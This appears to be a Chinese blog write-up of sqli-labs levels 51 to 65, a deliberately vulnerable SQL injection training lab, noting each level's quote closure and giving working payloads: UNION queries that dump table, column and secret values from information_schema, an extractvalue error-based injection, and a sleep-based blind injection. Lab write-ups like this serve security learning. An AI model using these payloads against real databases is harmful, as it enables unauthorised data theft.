zoukankan      html  css  js  c++  java

  • sql-ilabs闯关51-65关——通关记录

    sqli-labs闯关51-65——通关记录

    Less-51

    测试可得本关是单引号注入

    和上题类似

    Less-52

    本题是盲注,没有报错信息,可以使用sqlmap,或者使用延时注入,不多说

    Less-53

    本题也和上面的题没区别

    Less-54

    这题可以知道库名就是challenges,因为限制了查询次数,所以这题不能用sqlmap

    本题可以直接使用联合查询,且可以测出闭合方式为单引号,构造语句

    ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

    接下来一套组合拳

    ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='9ntli72i5o' --+	#爆列


    ?id=-1' union select 1,group_concat(secret_0VFF),3 from challenges.9ntli72i5o --+	#爆字段

    成功

    Less-55

    可以测试出,本题闭合方式为小括号,其余和上题类似,不再赘述

    Less-56

    本题基于单引号小括号

    Less-57

    本题基于双引号

    Less-58

    可以发现这一关没有返回数据库内容,因此无法使用union select,但是可以使用报错注入,使用的是同一个数据库,因此可以直接在前面的关卡获得表名

    ?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘apipvq6e4j’),0x7e)) --+

    Less-59

    本题和上题类似,闭合方式为单引号

    Less-60

    和上题类似,闭合方式是双引号

    Less-61

    和上题类似,闭合方式是单引号两个小括号

    Less-62

    本题没有报错提示,就不能用报错注入,采用盲注

    ?id=1) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79 ,0,sleep(10))–+

    Less-63——65

    都是盲注,只是闭合方式不一样,不多说

    终于做完了,要命
  • 相关阅读:
    7.21
    7.14
    7.7
    大学生失物招领平台使用体验及改进意见
    cdh集群迁移 ip更改
    klearn.preprocessing.PolynomialFeatures学习
    二元线性回归
    python学习之numpy.ewaxis
    sklearn.linear_model.LinearRegresion学习
    一元线性回归-梯度下降法-房价预测
  • 原文地址:https://www.cnblogs.com/yyy-fff/p/14393799.html
Copyright © 2011-2022 走看看